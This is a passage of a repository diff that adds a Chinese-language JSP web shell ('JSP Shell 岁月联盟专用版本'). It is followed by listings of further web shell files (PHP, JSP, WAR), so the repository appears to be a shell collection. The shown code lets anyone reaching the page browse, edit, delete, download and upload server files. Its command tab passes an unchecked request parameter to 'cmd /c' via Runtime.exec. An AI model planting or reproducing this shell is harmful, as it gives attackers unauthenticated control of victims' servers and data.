|
||||
private boolean compareBoundary(String boundary, byte ba[]) {
|
||||
byte b;
|
||||
if (boundary == null || ba == null) return false;
|
||||
for (int i = 0; i < boundary.length(); i++)
|
||||
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Convenience method to read HTTP header lines */
|
||||
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||||
byte b[] = new byte[1024];
|
||||
int read = sis.readLine(b, 0, b.length), index;
|
||||
String line = null;
|
||||
if (read != -1) {
|
||||
line = new String(b, 0, read);
|
||||
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||||
}
|
||||
return line;
|
||||
}
|
||||
|
||||
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||||
String path = null;
|
||||
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||||
"dir or fileName is null");
|
||||
int index = fileName.lastIndexOf('/');
|
||||
String name = null;
|
||||
if (index >= 0) name = fileName.substring(index + 1);
|
||||
else name = fileName;
|
||||
index = name.lastIndexOf('\\');
|
||||
if (index >= 0) fileName = name.substring(index + 1);
|
||||
path = dir + File.separator + fileName;
|
||||
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||||
else return path.replace('/', File.separatorChar);
|
||||
}
|
||||
} //End of class HttpMultiPartParser
|
||||
|
||||
String formatPath(String p)
|
||||
{
|
||||
StringBuffer sb=new StringBuffer();
|
||||
for (int i = 0; i < p.length(); i++)
|
||||
{
|
||||
if(p.charAt(i)=='\\')
|
||||
{
|
||||
sb.append("\\\\");
|
||||
}
|
||||
else
|
||||
{
|
||||
sb.append(p.charAt(i));
|
||||
}
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts some important chars (int) to the corresponding html string
|
||||
*/
|
||||
static String conv2Html(int i) {
|
||||
if (i == '&') return "&";
|
||||
else if (i == '<') return "<";
|
||||
else if (i == '>') return ">";
|
||||
else if (i == '"') return """;
|
||||
else return "" + (char) i;
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts a normal string to a html conform string
|
||||
*/
|
||||
static String htmlEncode(String st) {
|
||||
StringBuffer buf = new StringBuffer();
|
||||
for (int i = 0; i < st.length(); i++) {
|
||||
buf.append(conv2Html(st.charAt(i)));
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
String getDrivers()
|
||||
/**
|
||||
Windows系统上取得可用的所有逻辑盘
|
||||
*/
|
||||
{
|
||||
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
|
||||
File roots[]=File.listRoots();
|
||||
for(int i=0;i<roots.length;i++)
|
||||
{
|
||||
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
|
||||
sb.append(roots[i]+"</a> ");
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
static String convertFileSize(long filesize)
|
||||
{
|
||||
//bug 5.09M 显示5.9M
|
||||
String strUnit="Bytes";
|
||||
String strAfterComma="";
|
||||
int intDivisor=1;
|
||||
if(filesize>=1024*1024)
|
||||
{
|
||||
strUnit = "MB";
|
||||
intDivisor=1024*1024;
|
||||
}
|
||||
else if(filesize>=1024)
|
||||
{
|
||||
strUnit = "KB";
|
||||
intDivisor=1024;
|
||||
}
|
||||
if(intDivisor==1) return filesize + " " + strUnit;
|
||||
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
|
||||
if(strAfterComma=="") strAfterComma=".0";
|
||||
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
request.setCharacterEncoding("gb2312");
|
||||
String tabID = request.getParameter("tabID");
|
||||
String strDir = request.getParameter("path");
|
||||
String strAction = request.getParameter("action");
|
||||
String strFile = request.getParameter("file");
|
||||
String strPath = strDir + "\\" + strFile;
|
||||
String strCmd = request.getParameter("cmd");
|
||||
StringBuffer sbEdit=new StringBuffer("");
|
||||
StringBuffer sbDown=new StringBuffer("");
|
||||
StringBuffer sbCopy=new StringBuffer("");
|
||||
StringBuffer sbSaveCopy=new StringBuffer("");
|
||||
StringBuffer sbNewFile=new StringBuffer("");
|
||||
|
||||
if((tabID==null) || tabID.equals(""))
|
||||
{
|
||||
tabID = "1";
|
||||
}
|
||||
|
||||
if(strDir==null||strDir.length()<1)
|
||||
{
|
||||
strDir = request.getRealPath("/");
|
||||
}
|
||||
|
||||
|
||||
if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
if(f.length()==0)
|
||||
{
|
||||
sbDown.append("文件大小为 0 字节,就不用下了吧");
|
||||
}
|
||||
else
|
||||
{
|
||||
response.setHeader("content-type","text/html; charset=ISO-8859-1");
|
||||
response.setContentType("APPLICATION/OCTET-STREAM");
|
||||
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
|
||||
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
|
||||
out.clearBuffer();
|
||||
int i;
|
||||
while ((i=fileInputStream.read()) != -1)
|
||||
{
|
||||
out.write(i);
|
||||
}
|
||||
fileInputStream.close();
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("del"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
f.delete();
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
|
||||
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
|
||||
sbEdit.append("<input type=hidden name=action value=save >\r\n");
|
||||
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
|
||||
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"\r\n");
|
||||
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
|
||||
String line="";
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbEdit.append(htmlEncode(line)+"\r\n");
|
||||
}
|
||||
sbEdit.append("</textarea>");
|
||||
sbEdit.append("<input type=hidden name=path value="+strDir+">");
|
||||
sbEdit.append("</form>");
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("save"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
|
||||
String strContent=request.getParameter("content");
|
||||
bw.write(strContent);
|
||||
bw.close();
|
||||
}
|
||||
if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
|
||||
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
|
||||
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbCopy.append("原始文件: "+strPath+"<p>");
|
||||
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
|
||||
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
|
||||
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> \r\n");
|
||||
sbCopy.append("</form>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
String strDesFile=request.getParameter("file2");
|
||||
if(strDesFile==null || strDesFile.equals(""))
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
File f_des=new File(strDesFile);
|
||||
if(f_des.isFile())
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strTmpFile=strDesFile;
|
||||
if(f_des.isDirectory())
|
||||
{
|
||||
if(!strDesFile.endsWith("\\"))
|
||||
{
|
||||
strDesFile=strDesFile+"\\";
|
||||
}
|
||||
strTmpFile=strDesFile+"cqq_"+strFile;
|
||||
}
|
||||
|
||||
File f_des_copy=new File(strTmpFile);
|
||||
FileInputStream in1=new FileInputStream(f);
|
||||
FileOutputStream out1=new FileOutputStream(f_des_copy);
|
||||
byte[] buffer=new byte[1024];
|
||||
int c;
|
||||
while((c=in1.read(buffer))!=-1)
|
||||
{
|
||||
out1.write(buffer,0,c);
|
||||
}
|
||||
in1.close();
|
||||
out1.close();
|
||||
|
||||
sbSaveCopy.append("原始文件 :"+strPath+"<p>");
|
||||
sbSaveCopy.append("目标文件 :"+strTmpFile+"<p>");
|
||||
sbSaveCopy.append("<font color=red>复制成功!</font>");
|
||||
}
|
||||
}
|
||||
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("newFile"))
|
||||
{
|
||||
String strF=request.getParameter("fileName");
|
||||
String strType1=request.getParameter("btnNewFile");
|
||||
String strType2=request.getParameter("btnNewDir");
|
||||
String strType="";
|
||||
if(strType1==null)
|
||||
{
|
||||
strType="Dir";
|
||||
}
|
||||
else if(strType2==null)
|
||||
{
|
||||
strType="File";
|
||||
}
|
||||
if(!strType.equals("") && !(strF==null || strF.equals("")))
|
||||
{
|
||||
File f_new=new File(strF);
|
||||
if(strType.equals("File") && !f_new.createNewFile())
|
||||
sbNewFile.append(strF+" 文件创建失败");
|
||||
if(strType.equals("Dir") && !f_new.mkdirs())
|
||||
sbNewFile.append(strF+" 目录创建失败");
|
||||
}
|
||||
else
|
||||
{
|
||||
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
|
||||
}
|
||||
}
|
||||
|
||||
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
|
||||
{
|
||||
String tempdir=".";
|
||||
boolean error=false;
|
||||
response.setContentType("text/html");
|
||||
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
|
||||
HttpMultiPartParser parser = new HttpMultiPartParser();
|
||||
|
||||
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||||
String bound = request.getContentType().substring(bstart + 8);
|
||||
int clength = request.getContentLength();
|
||||
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
|
||||
if (ht.get("cqqUploadFile") != null)
|
||||
{
|
||||
|
||||
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
|
||||
File f1 = fi.file;
|
||||
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
|
||||
if (info != null && info.aborted)
|
||||
{
|
||||
f1.delete();
|
||||
request.setAttribute("error", "Upload aborted");
|
||||
}
|
||||
else
|
||||
{
|
||||
String path = (String) ht.get("path");
|
||||
if(path!=null && !path.endsWith("\\"))
|
||||
path = path + "\\";
|
||||
if (!f1.renameTo(new File(path + f1.getName())))
|
||||
{
|
||||
request.setAttribute("error", "Cannot upload file.");
|
||||
error = true;
|
||||
f1.delete();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
td,select,input,body{font-size:9pt;}
|
||||
A { TEXT-DECORATION: none }
|
||||
|
||||
#tablist{
|
||||
padding: 5px 0;
|
||||
margin-left: 0;
|
||||
margin-bottom: 0;
|
||||
margin-top: 0.1em;
|
||||
font:9pt;
|
||||
}
|
||||
|
||||
#tablist li{
|
||||
list-style: none;
|
||||
display: inline;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
#tablist li a{
|
||||
padding: 3px 0.5em;
|
||||
margin-left: 3px;
|
||||
border: 1px solid ;
|
||||
background: F6F6F6;
|
||||
}
|
||||
|
||||
#tablist li a:link, #tablist li a:visited{
|
||||
color: navy;
|
||||
}
|
||||
|
||||
#tablist li a.current{
|
||||
background: #EAEAFF;
|
||||
}
|
||||
|
||||
#tabcontentcontainer{
|
||||
width: 100%;
|
||||
padding: 5px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
|
||||
.tabcontent{
|
||||
display:none;
|
||||
}
|
||||
|
||||
</style>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
|
||||
|
||||
////////Stop editting////////////////
|
||||
|
||||
function cascadedstyle(el, cssproperty, csspropertyNS){
|
||||
if (el.currentStyle)
|
||||
return el.currentStyle[cssproperty]
|
||||
else if (window.getComputedStyle){
|
||||
var elstyle=window.getComputedStyle(el, "")
|
||||
return elstyle.getPropertyValue(csspropertyNS)
|
||||
}
|
||||
}
|
||||
|
||||
var previoustab=""
|
||||
|
||||
function expandcontent(cid, aobject){
|
||||
if (document.getElementById){
|
||||
highlighttab(aobject)
|
||||
if (previoustab!="")
|
||||
document.getElementById(previoustab).style.display="none"
|
||||
document.getElementById(cid).style.display="block"
|
||||
previoustab=cid
|
||||
if (aobject.blur)
|
||||
aobject.blur()
|
||||
return false
|
||||
}
|
||||
else
|
||||
return true
|
||||
}
|
||||
|
||||
function highlighttab(aobject){
|
||||
if (typeof tabobjlinks=="undefined")
|
||||
collecttablinks()
|
||||
for (i=0; i<tabobjlinks.length; i++)
|
||||
tabobjlinks[i].style.backgroundColor=initTabcolor
|
||||
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
|
||||
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
|
||||
}
|
||||
|
||||
function collecttablinks(){
|
||||
var tabobj=document.getElementById("tablist")
|
||||
tabobjlinks=tabobj.getElementsByTagName("A")
|
||||
}
|
||||
|
||||
function do_onload(){
|
||||
collecttablinks()
|
||||
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
|
||||
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
|
||||
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
|
||||
}
|
||||
|
||||
if (window.addEventListener)
|
||||
window.addEventListener("load", do_onload, false)
|
||||
else if (window.attachEvent)
|
||||
window.attachEvent("onload", do_onload)
|
||||
else if (document.getElementById)
|
||||
window.onload=do_onload
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
<script language="javascript">
|
||||
|
||||
function doForm(action,path,file,cmd,tab,content)
|
||||
{
|
||||
document.frmCqq.action.value=action;
|
||||
document.frmCqq.path.value=path;
|
||||
document.frmCqq.file.value=file;
|
||||
document.frmCqq.cmd.value=cmd;
|
||||
document.frmCqq.tabID.value=tab;
|
||||
document.frmCqq.content.value=content;
|
||||
if(action=="del")
|
||||
{
|
||||
if(confirm("确定要删除文件 "+file+" 吗?"))
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
else
|
||||
{
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
<title>JSP Shell 岁月联盟专用版本</title>
|
||||
<head>
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<form name="frmCqq" method="post" action="">
|
||||
<input type="hidden" name="action" value="">
|
||||
<input type="hidden" name="path" value="">
|
||||
<input type="hidden" name="file" value="">
|
||||
<input type="hidden" name="cmd" value="">
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type="hidden" name="content" value="">
|
||||
</form>
|
||||
|
||||
<!--Top Menu Started-->
|
||||
<ul id="tablist">
|
||||
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
|
||||
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
|
||||
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
|
||||
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
|
||||
<%=authorInfo[languageNo]%>
|
||||
</ul>
|
||||
<!--Top Menu End-->
|
||||
|
||||
|
||||
<%
|
||||
StringBuffer sbFolder=new StringBuffer("");
|
||||
StringBuffer sbFile=new StringBuffer("");
|
||||
try
|
||||
{
|
||||
File objFile = new File(strDir);
|
||||
File list[] = objFile.listFiles();
|
||||
if(objFile.getAbsolutePath().length()>3)
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
|
||||
|
||||
|
||||
}
|
||||
for(int i=0;i<list.length;i++)
|
||||
{
|
||||
if(list[i].isDirectory())
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td>");
|
||||
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strLen="";
|
||||
String strDT="";
|
||||
long lFile=0;
|
||||
lFile=list[i].length();
|
||||
strLen = convertFileSize(lFile);
|
||||
Date dt=new Date(list[i].lastModified());
|
||||
strDT=dt.toLocaleString();
|
||||
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
|
||||
sbFile.append(""+list[i].getName());
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strLen);
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strDT);
|
||||
sbFile.append("</td><td>");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileEdit[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDel[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDown[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileCopy[languageNo]+"</a> ");
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
|
||||
}
|
||||
%>
|
||||
|
||||
<DIV id="tabcontentcontainer">
|
||||
|
||||
|
||||
<div id="menu3" class="tabcontent">
|
||||
<br>
|
||||
<br> 未完成
|
||||
<br>
|
||||
<br>
|
||||
|
||||
</div>
|
||||
|
||||
<div id="menu4" class="tabcontent">
|
||||
<br>
|
||||
<p>一、功能说明</p>
|
||||
<p> jsp 版本的文件管理器,通过该程序可以远程管理服务器上的文件系统,您可以新建、修改、</p>
|
||||
<p>删除、下载文件和目录。对于windows系统,还提供了命令行窗口的功能,可以运行一些程序,类似</p>
|
||||
<p>与windows的cmd。</p>
|
||||
<p> </p>
|
||||
<p>二、测试</p>
|
||||
<p> <b>请大家在使用过程中,有任何问题,意见或者建议都可以给我留言,以便使这个程序更加完善和稳定,<p>
|
||||
留言地址为:<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
|
||||
<p> </p>
|
||||
<p>三、更新记录</p>
|
||||
<p> 2004.11.15 V0.9测试版发布,增加了一些基本的功能,文件编辑、复制、删除、下载、上传以及新建文件目录功能</p>
|
||||
<p> 2004.10.27 暂时定为0.6版吧, 提供了目录文件浏览功能 和 cmd功能</p>
|
||||
<p> 2004.09.20 第一个jsp 程序就是这个简单的显示目录文件的小程序</p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="menu1" class="tabcontent">
|
||||
<%
|
||||
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+": <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
|
||||
%>
|
||||
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
|
||||
|
||||
<tr>
|
||||
<td width="25%" align="center" valign="top">
|
||||
<table width="98%" border="0" cellspacing="0" cellpadding="3">
|
||||
<%=sbFolder%>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="81%" align="left" valign="top">
|
||||
|
||||
<%
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
out.println(sbEdit.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
out.println(sbCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
out.println(sbDown.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
out.println(sbSaveCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
|
||||
{
|
||||
out.println(sbNewFile.toString());
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
|
||||
<tr bgcolor="#E7e7e6">
|
||||
<td width="26%"><%=strFileName[languageNo]%></td>
|
||||
<td width="19%"><%=strFileSize[languageNo]%></td>
|
||||
<td width="29%"><%=strLastModified[languageNo]%></td>
|
||||
<td width="26%"><%=strFileOperation[languageNo]%></td>
|
||||
</tr>
|
||||
<%=sbFile%>
|
||||
<!-- <tr align="center">
|
||||
<td colspan="4"><br>
|
||||
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
|
||||
KB </td>
|
||||
</tr>
|
||||
-->
|
||||
</table>
|
||||
</span>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<form name="frmMake" action="" method="post">
|
||||
<tr><td colspan=2 bgcolor=#FBFFC6>
|
||||
<input type="hidden" name="action" value="newFile">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<%
|
||||
if(!strDir.endsWith("\\"))
|
||||
strDir = strDir + "\\";
|
||||
%>
|
||||
<input type="text" name="fileName" size=36 value="<%=strDir%>">
|
||||
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
|
||||
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
|
||||
</form>
|
||||
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="action" value="upload">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<input type="file" name="cqqUploadFile" size="36">
|
||||
<input type="submit" name="submit" value="上传">
|
||||
</td></tr></form>
|
||||
</table>
|
||||
</div>
|
||||
<div id="menu2" class="tabcontent">
|
||||
|
||||
<%
|
||||
String line="";
|
||||
StringBuffer sbCmd=new StringBuffer("");
|
||||
|
||||
if(strCmd!=null)
|
||||
{
|
||||
try
|
||||
{
|
||||
//out.println(strCmd);
|
||||
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbCmd.append(line+"\r\n");
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
System.out.println(e.toString());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
strCmd = "set";
|
||||
}
|
||||
|
||||
%>
|
||||
<form name="cmd" action="" method="post">
|
||||
|
||||
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
|
||||
</form>
|
||||
<%
|
||||
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
|
||||
{
|
||||
%>
|
||||
<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
|
||||
<br>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
</DIV>
|
||||
</div>
|
||||
<br><br>
|
||||
<center><a href="http://www.syue.com" target="_blank">岁月</a>
|
||||
<br>
|
3294
jsp/t00ls.jsp
Normal file
3294
jsp/t00ls.jsp
Normal file
File diff suppressed because it is too large
Load diff
BIN
other/icesword.war
Normal file
BIN
other/icesword.war
Normal file
Binary file not shown.
38
php/404.php
Normal file
38
php/404.php
Normal file
File diff suppressed because one or more lines are too long
2720
php/icesword.php
Normal file
2720
php/icesword.php
Normal file
File diff suppressed because one or more lines are too long
1284
php/itsec.php
Normal file
1284
php/itsec.php
Normal file
File diff suppressed because it is too large
Load diff
2210
php/silic.php
Normal file
2210
php/silic.php
Normal file
File diff suppressed because one or more lines are too long
2136
php/spy.php
Normal file
2136
php/spy.php
Normal file
File diff suppressed because it is too large
Load diff
Loading…
Reference in a new issue